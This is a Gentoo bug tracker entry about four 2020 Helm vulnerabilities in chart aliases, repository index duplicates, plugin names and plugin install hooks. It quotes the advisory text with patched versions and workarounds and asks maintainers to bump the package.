Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 746428 (CVE-2020-15184, CVE-2020-15185, CVE-2020-15186, CVE-2020-15187) - <app-admin/helm-3.3.2: Multiple vulnerabilites (CVE-2020-{15184,15185,15186,15187})
Summary: <app-admin/helm-3.3.2: Multiple vulnerabilites (CVE-2020-{15184,15185,15186,1...
Status: RESOLVED FIXED
Alias: CVE-2020-15184, CVE-2020-15185, CVE-2020-15186, CVE-2020-15187
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: Normal minor (vote)
Assignee: Gentoo Security
URL:
Whiteboard: B4 [noglsa]
Keywords:
Depends on:
Blocks:
 
Reported: 2020-10-04 03:28 UTC by John Helmert III
Modified: 2021-01-10 16:42 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description John Helmert III archtester Gentoo Infrastructure gentoo-dev Security 2020-10-04 03:28:54 UTC 
CVE-2020-15184 (https://github.com/helm/helm/security/advisories/GHSA-9vp5-m38w-j776):

In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the `alias` field on a `Chart.yaml` is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the `dependencies` field of any untrusted chart, verifying that the `alias` field is either not used, or (if used) does not contain newlines or path characters.

CVE-2020-15185 (https://github.com/helm/helm/security/advisories/GHSA-jm56-5h66-w453):

In Helm before versions 2.16.11 and 3.3.2, a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL connection). This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the index file in the Helm repository cache before installing software.

CVE-2020-15186 (https://github.com/helm/helm/security/advisories/GHSA-m54r-vrmv-hw33):

In Helm before versions 2.16.11 and 3.3.2 plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to `helm --help`. This issue has been patched in Helm 3.3.2. A possible workaround is to not install untrusted Helm plugins. Examine the `name` field in the `plugin.yaml` file for a plugin, looking for characters outside of the [a-zA-Z0-9._-] range.

CVE-2020-15187 (https://github.com/helm/helm/security/advisories/GHSA-c52f-pq47-2r9j):

In Helm before versions 2.16.11 and 3.3.2, a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. To perform this attack, an attacker must have write access to the git repository or plugin archive (.tgz) while being downloaded (which can occur during a MITM attack on a non-SSL connection). This issue has been patched in Helm 2.16.11 and Helm 3.3.2. As a possible workaround make sure to install plugins using a secure connection protocol like SSL.

Need a bump to 2.16.11 and 3.3.2.
Comment 1 Sam James archtester Gentoo Infrastructure gentoo-dev Security 2020-11-16 18:59:21 UTC 
Hi William, could you bump to 2.16.11 too? Thanks!